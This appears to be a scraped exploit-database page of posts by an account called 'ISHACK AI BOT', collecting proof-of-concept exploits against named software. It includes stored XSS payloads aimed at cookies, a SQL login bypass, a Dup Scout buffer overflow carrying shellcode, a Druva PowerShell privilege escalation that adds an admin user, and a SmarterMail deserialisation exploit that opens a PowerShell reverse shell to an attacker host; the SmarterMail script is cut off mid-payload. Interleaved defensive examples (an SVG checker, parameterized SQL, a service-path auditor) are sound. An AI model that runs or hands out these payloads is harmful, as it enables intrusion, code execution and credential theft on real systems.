All posts published by ISHACK AI BOT
-
Laravel Nova 3.7.0 - 'range' DoS
# Exploit Title: Laravel Nova 3.7.0 - 'range' DoS
# Date: June 22, 2020
# Exploit Author: iqzer0
# Vendor Homepage: https://nova.laravel.com/
# Software Link: https://nova.laravel.com/releases
# Version: Version v3.7.0
# Tested on: Manjaro / Chrome v83

An authenticated user can crash the application by setting a high value for the 'range' parameter (default 30) and sending simultaneous requests (10 simultaneous requests were enough to DoS the server in my testing).

Vulnerable URL: https://example.com/nova-api/metrics/sum-orders?timezone=Indian%2FMaldives&twelveHourTime=true&range=3000000

Vulnerable Parameter: range
-
Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting
# Exploit Title: Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting
# Date: 04-12-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.formalms.org/download.html
# Software Link: https://www.formalms.org/
# Version: 2.3
# Tested on: Windows 10/Kali Linux

Steps-To-Reproduce:
1. Go to the Forma LMS and log in to your account.
2. Now go to the User Profile.
3. Now edit the profile.
4. Put the below payload in first and last name:
   "<script>alert(document.cookie)</script>"
5. Now click on the Save button.
6. The XSS will be triggered.
-
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)
# Exploit Title: CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)
# Date: 04/12/2020
# Exploit Author: Eshan Singh
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads
# Version: cmsms v2.2.15
# Tested on: Windows/Kali Linux/Ubuntu

Description
----------------------
CMS Made Simple 2.2.15 allows an authenticated user with access to the Content Manager to edit content and store a persistent XSS payload using a malicious SVG file. The user can get cookies from every authenticated user who visits the website.

SVG Payload
-------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg

Steps to reproduce
-------------------
1. Log in to the cmsms admin panel using the admin user.
2. Then go to Content > File Manager > Images and upload the malicious SVG file (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg).
3. Now open the SVG file location (http://127.0.0.1/cmsms/uploads//images/SVG_XSS.svg) and BOOM! You get the popup.

Burp Request
-------------
POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------379224531139948695983200896304
Content-Length: 1040
Origin: http://127.0.0.1
Connection: close
Cookie: a3c9a2f9998cdfdc410fef5f094579cb8f2f3306=c36ffe152373337eee92ec4985172db8528361bf%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoicjB4NHIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkbElVM2FsR2l6UkR0dG5ROHJPVVwvd3V3M3hXano1M0wzYW9pVUhxT2pWQW4xaHNPNjZDLm9HIn0%3D; __c=3d8ee0fbb464e874e82; CMSSESSID5d26ee9cb371=b1gen2isn6vf4g1sal7jdt5upv

-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="mact"

FileManager,m1_,upload,0
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="__c"

3d8ee0fbb464e874e82
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="disable_buffer"

1
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="m1_files[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>
-----------------------------379224531139948695983200896304--
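The upload above succeeds because the file manager accepts any file that claims to be image/svg+xml, and the browser then renders the stored file as a document in the site's origin. An upload handler has to inspect the SVG itself. The following checker is an added example, not code from CMS Made Simple or from the advisory author: it parses the SVG as XML and reports the constructs that give an SVG script capability (script and foreign-content elements, on* event attributes, javascript:/data: URLs in href-like attributes, external loads from an inline stylesheet). The function names and the sample documents are mine; the first sample is the advisory's payload reproduced inline.

```python
import xml.etree.ElementTree as ET

# Element local names that execute script or embed foreign content.
DANGEROUS_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# href-like attributes whose value must not carry an executable scheme
# (animate/set use from/to/values to rewrite href at runtime).
URL_ATTRS = {"href", "src", "from", "to", "values"}
BAD_SCHEMES = ("javascript:", "data:", "vbscript:")

# Constructed samples. SVG_SCRIPT is the payload from the advisory above.
SVG_SCRIPT = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(document.domain);</script>
</svg>"""
SVG_ONLOAD = ('<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">'
              '<rect width="1" height="1"/></svg>')
SVG_JS_HREF = ('<svg xmlns="http://www.w3.org/2000/svg" '
               'xmlns:xlink="http://www.w3.org/1999/xlink">'
               '<a xlink:href="javascript:alert(1)"><text>x</text></a></svg>')
SVG_BENIGN = ('<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
              '<rect width="10" height="10" fill="#090"/></svg>')


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(svg_text):
    """Return (element, reason) pairs; an empty list means none of the
    active-content constructs checked here is present."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [("<document>", "not well-formed XML: %s" % exc)]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            findings.append((tag, "active-content element"))
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append((tag, "event handler attribute " + name))
            elif name in URL_ATTRS:
                scheme = value.strip().lower().replace("\x00", "").split(":", 1)[0] + ":"
                if scheme in BAD_SCHEMES:
                    findings.append((tag, "%s uses %s URL" % (name, scheme)))
        if tag == "style" and el.text and ("url(" in el.text or "@import" in el.text):
            findings.append((tag, "stylesheet references an external resource"))
    return findings


def svg_is_safe(svg_text):
    return not svg_findings(svg_text)


if __name__ == "__main__":
    for label, doc in [("script", SVG_SCRIPT), ("onload", SVG_ONLOAD),
                       ("js-href", SVG_JS_HREF), ("benign", SVG_BENIGN)]:
        print(label, "->", svg_findings(doc) or "clean")
```

Rejecting on findings is only half of the fix: SVG that passes should still be served with Content-Disposition: attachment or from a separate static-content origin, and with a Content-Security-Policy of `sandbox`, so that a parser bypass cannot run script in the application's origin.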
-
Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path
# Exploit Title: Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc "RumbleService"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: RumbleService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Rumble\rumble_win32.exe --service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Rumble Mail Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
-
Zabbix 5.0.0 - Stored XSS via URL Widget Iframe
# Exploit Title: Zabbix 5.0.0 - Stored XSS via URL Widget Iframe
# Date: 8/11/2020
# Exploit Author: Shwetabh Vishnoi
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/download
# Affected Version: Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1
# CVE : CVE-2020-15803

Affected URL/endpoint(s):
http://192.168.1.7/zabbix.php?sid=f7ca8c8270ce38c7&action=dashboard.widget.check

Affected Param:
<iframe src="http://localhost/hello.html" scrolling="auto" id="iframe" class="widget-url" width="100%" height="100%"></iframe>

Description:
The application contains widget functionality within the Global View Dashboard which can be used by a malicious admin to propagate a stored cross-site scripting attack. The "URL" widget iframe does not have any built-in restrictions on the content executing within it.

Impact:
The malicious web pages within iframes can be used for hosting forms for phishing, malware propagation, forced redirections, etc. The affected Global View dashboard is displayed to all the users of the application, so all users will be affected by this vulnerability.

Reproduction Steps:
1. Log in to the application as Admin.
2. In the Global View Dashboard, add a widget.
3. Select Type "URL" and fill in any random values for Name and Refresh Interval.
4. Now, in the URL parameter, enter a malicious URL.
5. For demo purposes, I have hosted a web server on my machine and hosted a web page at http://localhost/hello.html. (Alternatively, you can use "http://14.rs" to display popups.)
6. The malicious web page containing the payload will be executed on the dashboard via the iframe.
7. The executed content can redirect the user to a malicious page (we have used the Bing page for redirection).
-
Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting
# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting
# Date: 04-12-2020
# Exploit Author: Pruthvi Nekkanti
# Vendor Homepage: https://phpgurukul.com
# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
# Version: 1.0
# Tested on: Kali Linux

Attack vector:
This vulnerability allows an attacker to inject an XSS payload into the admin username; each time any user visits the website the XSS triggers, and the attacker is able to steal the cookie according to the crafted payload.

Vulnerable Parameters: Admin Username.

Steps-To-Reproduce:
1. Go to the product admin panel and change the admin username.
2. Put this payload in the admin username field: "><script>alert(document.cookie)</script>
3. Now go to the website and the XSS will be triggered.
-
Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path
# Exploit Title: Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 05-12-2020
# Vendor Homepage: https://www.kite.com/
# Software Links : https://www.kite.com/download/
# Tested Version: 1.2020.1119.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
KiteService    KiteService    C:\Program Files\Kite\KiteService.exe    Auto

C:\>sc qc "KiteService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: KiteService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : KiteService
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
-
TapinRadio 2.13.7 - Denial of Service (PoC)
# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Version: 2.13.7 x64
# Tested on: Windows 10 Home x64

#STEPS
# Open the program TapinRadio
# In Settings select the Preferences option
# Click Miscellaneous and click Set Application Proxy
# Run the python exploit script; it will create a new .txt file
# Copy the content of the file "Mikon.txt"
# Paste the content in the fields Username and Address and click OK
# Click OK again
# After TapinRadio closes, the program does not work again if the user tries to open it, so it is necessary to uninstall and reinstall it
# End :)

buffer = 'K' * 20000

try:
    with open("Mikon.txt", "w") as f:
        f.write(buffer)
    print("Archive ready")
except IOError:
    print("Archive not ready")
-
RarmaRadio 2.72.5 - Denial of Service (PoC)
# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: https://www.raimersoft.com/rarmaradio.html
# Version: 2.75.5
# Tested on: Windows 10 Home x64
# CVE : n/a

#STEPS
# Open the program TapinRadio
# In Edit select the Settings option
# Click Network
# Run the python exploit script; it will create a new .txt file
# Copy the content of the file "Paimon.txt"
# Paste the content in the fields Username, Address and Server and click OK
# End :)

buffer = 'K' * 20000

try:
    with open("Paimon.txt", "w") as f:
        f.write(buffer)
    print("Archive ready")
except IOError:
    print("Archive not ready")
-
Savsoft Quiz 5 - 'Skype ID' Stored XSS
# Exploit Title: Savsoft Quiz 5 - 'Skype ID' Stored XSS
# Exploit Author: Dipak Panchal(th3.d1p4k)
# Vendor Homepage: https://savsoftquiz.com
# Software Link: https://github.com/savsofts/savsoftquiz_v5
# Version: 5
# Tested on: Windows 10

Attack Vector:
This vulnerability allows an attacker to inject an XSS payload in the User Registration section; each time the admin visits the Manage User section of the admin panel, and the home page too, the XSS triggers and the attacker is able to steal the cookie according to the crafted payload.

Steps to reproduce:
1. Create a new account and verify it.
2. Navigate to Edit Profile: -> http://localhost/savsoftquiz/index.php/user/edit_user/123
3. Put the below payload in the Skype ID field and submit it.
   Payload: abcd<script>alert("XSS")</script>
4. You will get the XSS popup.
-
vBulletin 5.6.3 - 'group' Cross Site Scripting
# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting
# Date: 05.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox & Opera
# Google Dorks: "Powered by vBulletin® Version 5.6.3"
# Blog: https://pentestvincent.blogspot.com/2020/11/vbulletin-563-admin-cp-multiple.html

Go to the "Admin CP", click on "Styles", then click "Style Manager". Choose "Denim" or another theme, choose the action "Add new template" and click "Go". Put "1" in the title and "1" in the template and click "Save and Reload".

Now you can catch the new URL with HTTP Live Headers or by hand. So we have the URL:

https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0

Test it by hand and get cross site scripting. Use different browsers for the tests; I use Mozilla Firefox and Opera.

https://localhost/admincp/template.php?templateid=1&group=""><script>alert("Cross Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=

Picture: https://imgur.com/a/b6gH5Fn
-
Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
# Requires web service to be enabled.
# Tested on Windows 10 Pro (x64)
# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457
# Credits: Tulpa and SICKNESS for original exploits
# Modified: @0rbz_
# Note: Python 2 script (str buffers and print statement).

import socket, os, time, struct, argparse, sys

parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()

host = args.host
port = 80

# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
buf = ""
buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43"
buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19"
buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02"
buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20"
buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6"
buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f"
buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f"
buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f"
buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c"
buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2"
buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10"
buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18"
buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77"
buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40"
buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42"
buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5"

buffer = "\x41" * 260
buffer += struct.pack("<L", 0x10090c83)  # JMP ESP - libspp
buffer += "\x90" * 20
buffer += buf
buffer += "\x90" * (10000 - len(buffer))

evil = "POST /online_registration HTTP/1.1\r\n"
evil += "Host: " + host + "\r\n"  # use the parsed --host value (the original read sys.argv[2])
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "customer_name=" + buffer
evil += "&unlock_key=" + buffer + "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
-
Online Bus Ticket Reservation 1.0 - SQL Injection
# Exploit Title: Online Bus Ticket Reservation 1.0 - SQL Injection
# Date: 2020-12-07
# Exploit Author: Sakshi Sharma
# Vendor Homepage: https://www.sourcecodester.com/php/5012/online-bus-ticket-reservation-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/busreservation.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

#Vulnerable Page: admin page

#Exploit
Open the application and check the URL: http://localhost/busreservation/index.php
Open Admin Login
Enter username: 'or"='
Enter password: 'or"='
Click on login
The SQL payload gets executed and authorization is bypassed successfully.
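The bypass works because the login form's values are concatenated into the SQL statement, so quote characters in them change the statement's structure. The following is an added example, not the application's code: a constructed SQLite stand-in for the admin table, the vulnerable string-built query next to its parameterized replacement, and a function that shows the statement the vulnerable version actually executes. The exact `'or"='` payload from the advisory depends on how that application quotes its values and on MySQL's comparison rules, so the example drives the demonstration with a plain `' OR 1=1 --` tautology that behaves the same in SQLite and MySQL. Function names and the sample credentials are mine.

```python
import sqlite3


def demo_db():
    """Constructed in-memory stand-in for the application's admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'S3cret!')")
    return conn


def rendered_query(username, password):
    """The statement the vulnerable login builds: input spliced into SQL text."""
    return ("SELECT COUNT(*) FROM admin WHERE username='%s' AND password='%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    # Whatever the user typed becomes part of the SQL grammar.
    return conn.execute(rendered_query(username, password)).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    # Placeholders: the driver passes the values separately from the
    # statement, so quotes and comment markers in them stay plain data.
    sql = "SELECT COUNT(*) FROM admin WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    conn = demo_db()
    tautology = "' OR 1=1 --"
    print(rendered_query(tautology, "anything"))
    print("vulnerable   :", login_vulnerable(conn, tautology, "anything"))
    print("parameterized:", login_parameterized(conn, tautology, "anything"))
```

The comment marker `--` swallows the rest of the statement, so the password check never runs; with placeholders the same string is simply a username nobody has.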
-
Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
# Date: 2020-12-03
# Exploit Author: 1F98D
# Original Author: Matteo Malvica
# Vendor Homepage: druva.com
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
# Version: 6.6.3
# Tested on: Windows 10 (x64)
# CVE: CVE-2020-5752
# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
#
# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.

$ErrorActionPreference = "Stop"

$cmd = "net user pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
-
Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path
# Exploit Title: Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 02-12-2020
# Vendor Homepage: https://www.microsoft.com
# Software Links : https://www.microsoft.com/en-us/p/xbox-beta/9mv0b5hzvk9z?activetab=pivot:overviewtab
# Tested Version: 2.47.10001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
GamingServices       GamingServices       C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe       Auto
GamingServicesNet    GamingServicesNet    C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe    Auto

C:\>sc qc "GamingServicesNet"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: GamingServicesNet
        TIPO               : 210  WIN32_PACKAGED_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : GamingServicesNet
        DEPENDENCIAS       : staterepository
        NOMBRE_INICIO_SERVICIO: NT AUTHORITY\LocalService

C:\>sc qc "GamingServices"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: GamingServices
        TIPO               : 210  WIN32_PACKAGED_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : GamingServices
        DEPENDENCIAS       : staterepository
        NOMBRE_INICIO_SERVICIO: LocalSystem
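The three unquoted-service-path entries on this page (Rumble, Kite, GamingServices) all stop at the `sc qc` output. What makes such a path exploitable is which file names the service control manager will try before the real image, and whether a low-privileged user can write to those directories. The following is an added example, not part of any of the advisories: it pulls the binary path out of `sc qc` output in either of the locales shown above, enumerates the candidate paths Windows tries for an unquoted path with spaces (each space-delimited prefix with `.exe` appended, which is the assumption the classic PoCs rely on), and lists the directories an attacker would need to write to. The sample output is the Rumble entry's, reproduced inline; function names are mine.

```python
import ntpath
import re

# Binary-path line of `sc qc`, in the English and Spanish locales seen on this page.
_BINPATH_RE = re.compile(
    r"^\s*(?:BINARY_PATH_NAME|NOMBRE_RUTA_BINARIO)\s*:\s*(.+?)\s*$", re.MULTILINE)

# Constructed sample: the `sc qc "RumbleService"` output from the Rumble entry.
SC_QC_SAMPLE = r"""
SERVICE_NAME: RumbleService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Rumble\rumble_win32.exe --service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Rumble Mail Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(sc_output):
    """Return the BINARY_PATH_NAME / NOMBRE_RUTA_BINARIO value, or None."""
    m = _BINPATH_RE.search(sc_output)
    return m.group(1) if m else None


def hijack_candidates(binary_path):
    """File names CreateProcess tries before the real image when the path is
    unquoted and contains spaces. Quoted paths and space-free paths give []."""
    path = binary_path.strip()
    if path.startswith('"'):
        return []
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the real image; the remaining tokens are arguments
        candidates.append(prefix + ".exe")  # assumption: .exe is appended to the bare prefix
    return candidates


def plant_directories(candidates):
    """Directories that must be writable to plant a candidate, deduplicated in order."""
    dirs = []
    for c in candidates:
        d = ntpath.dirname(c)
        if d not in dirs:
            dirs.append(d)
    return dirs


def audit(sc_output):
    path = binary_path_from_sc_qc(sc_output)
    cands = hijack_candidates(path) if path else []
    return {"path": path, "candidates": cands, "plant_dirs": plant_directories(cands)}


if __name__ == "__main__":
    for key, value in audit(SC_QC_SAMPLE).items():
        print("%-11s %s" % (key, value))
```

On the target, the remaining step is `icacls` on each listed directory: the path is only a privilege escalation if one of them grants write or create-file rights to the account you hold, which for `C:\` and `C:\Program Files` is not the case on a default Windows 10 install.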
-
Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting
# Exploit Title: Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting
# Date: 08/12/2020
# Exploit Author: Ritesh Gohil
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Steps to Reproduce:
1) Log in with Admin credentials and click on the 'Task' button.
2) Click on the Add New Task button.
3) Now add the following payload in the input fields Task and Description.
   Payload: ritesh"><img src=x onerror=alert(document.domain)>
4) Click on Save.
5) The XSS payload is triggered.
-
SmarterMail Build 6985 - Remote Code Execution
# Exploit Title: SmarterMail Build 6985 - Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Date: 10 May 2020
# Vendor Homepage: re
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
#
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
#
#!/usr/bin/python3

import base64
import socket
import sys
from struct import pack

HOST = '192.168.1.1'
PORT = 17001
LHOST = '192.168.1.2'
LPORT = 4444

psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
psh_shell = psh_shell.encode('utf-16')[2:]  # remove BOM
psh_shell = base64.b64encode(psh_shell)
psh_shell = psh_shell.ljust(1360, b' ')

# Serialized SortedSet<string>/ComparisonComparer gadget chain invoking
# Process.Start("cmd", "/c powershell.exe -encodedCommand XXXX..."); the
# 1360 'X' placeholder is swapped for the encoded reverse shell below.
payload = (
